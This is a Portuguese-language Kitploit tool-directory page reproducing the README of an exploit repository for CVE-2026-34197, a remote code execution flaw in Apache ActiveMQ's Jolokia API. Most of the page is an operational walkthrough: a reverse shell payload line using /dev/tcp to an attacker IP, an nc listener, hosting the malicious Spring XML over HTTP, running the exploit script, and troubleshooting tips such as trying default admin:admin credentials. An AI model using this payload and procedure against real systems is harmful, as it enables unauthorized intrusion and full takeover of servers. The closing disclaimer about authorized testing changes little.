Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-34197-payload-Apache-ActiveMQ- — Script de exploração para CVE-2026-34197, visando a API Jolokia do Apache ActiveMQ para obter execução remota de código por meio de configuração Spring XML maliciosa, com capacidade de shell reverso. | Kitploit
Ferramentas/GitHubGitHub/xshysjhq/cve-2026-34197-payload-apache-activemq-
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso RemotoDesenvolvimento de Payloads
GitHubxshysjhq/cve-2026-34197-payload-apache-activemq-

CVE-2026-34197-payload-Apache-ActiveMQ-

Script de exploração para CVE-2026-34197, visando a API Jolokia do Apache ActiveMQ para obter execução remota de código por meio de configuração Spring XML maliciosa, com capacidade de shell reverso.

Ver Repositório
1há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Guia de Reprodução da Vulnerabilidade RCE no ActiveMQ Jolokia

Este repositório fornece um ambiente de reprodução e um script de exploração para a execução remota de código (RCE) baseada na interface da API Jolokia exposta pelo Apache ActiveMQ (/api/jolokia/). Ao chamar a operação addNetworkConnector, o ActiveMQ é forçado a analisar um arquivo de configuração Spring XML remoto criado de forma maliciosa, explorando assim o MethodInvokingFactoryBean para executar comandos do sistema.

📁 Arquivos incluídos

  • payload.py: Script principal de exploração, que envia requisições HTTP POST com um nome de Broker dinâmico.
  • payload.xml: Arquivo de configuração Spring Bean malicioso, contendo o payload de comando para reverse shell.

🛠️ Preparação do ambiente

  1. Ambiente Python 3
  2. Instalar as dependências:
    root@kitploit:~
    pip install requests
    
  3. Máquina do atacante (ex.: servidor em nuvem): Deve possuir IP público, ser capaz de abrir a porta do serviço HTTP e a porta de escuta do reverse shell.
  4. Máquina alvo: Serviço ActiveMQ vulnerável (ex.: imagem Docker apache/activemq-classic:6.1.0).

🚀 Passos para reprodução

1. Configurar o payload de ataque (payload.xml)

Na máquina do atacante, abra o payload.xml e localize a seguinte seção:

root@kitploit:~
<value>bash -c 'bash -i >& /dev/tcp/SEU_IP_DO_SERVIDOR_NA_NUVEM/15000 0>&1'</value>

Substitua o IP pelo IP público do seu servidor na nuvem. Se o ambiente alvo não tiver bash, altere para sh ou outro método de execução, conforme o ambiente alvo.

2. Iniciar a escuta do reverse shell

Na máquina do atacante (servidor na nuvem), abra um terminal e escute na porta especificada (ex.: 15000):

root@kitploit:~
nc -lvvp 15000

Nota: Certifique-se de que o security group/firewall do servidor na nuvem liberou o tráfego de entrada na porta TCP 15000.

3. Iniciar o serviço HTTP para hospedar o payload

Na máquina do atacante (no mesmo diretório do payload.xml), inicie um servidor HTTP para que o alvo possa baixar o arquivo XML:

root@kitploit:~
python3 -m http.server 9000

Nota: Da mesma forma, certifique-se de que o security group/firewall do servidor na nuvem liberou o tráfego de entrada na porta TCP 9000.

4. Executar o script de exploração

Execute o payload.py na máquina local (ou na máquina do atacante). O script suporta a passagem do IP:porta do ActiveMQ alvo (-t) e do IP:porta da máquina do atacante que hospeda o XML (-a) por meio de argumentos de linha de comando.

root@kitploit:~
python payload.py -t 192.168.0.1:8161 -a 8.8.8.8:9000

Após a execução, o script gerará automaticamente um brokerName aleatório (ex.: rce_a1b2c3), resolvendo completamente o erro de conflito de nomes java.io.IOException : Network Connector could not be registered in JMX.

5. Obter o Shell

Se a exploração for bem-sucedida:

  1. O seu servidor HTTP (python3 -m http.server 9000) exibirá um registro de requisição GET 200 para /payload.xml.
  2. O seu terminal nc receberá a conexão do reverse shell vinda da máquina alvo.

⚠️ Solução de problemas comuns

  1. O XML foi obtido com sucesso (HTTP 200), mas não recebeu o Shell:
    • Causa A: O security group do servidor na nuvem bloqueou o reverse shell (tráfego de entrada não liberado na porta 15000).
    • Causa B: O contêiner alvo não possui o comando /bin/bash (comum em imagens base minimalistas como Alpine). Altere o comando de execução no payload.xml para /bin/sh, ou use wget/curl para transferir o script e depois executá-lo.
  2. O alvo retorna erro 401 Unauthorized:
  • Causa: Versões mais recentes do ActiveMQ / interface Jolokia exigem autenticação com usuário e senha.
  • Solução: Se forem credenciais padrão, adicione Basic Auth na requisição (ex.: admin:admin).

🛡️ Aviso legal

Este script e as instruções são destinados exclusivamente a testes de segurança autorizados e fins educacionais. É estritamente proibido o uso para testes ilegais não autorizados. O usuário é responsável pelas suas próprias ações.

Baixar ferramenta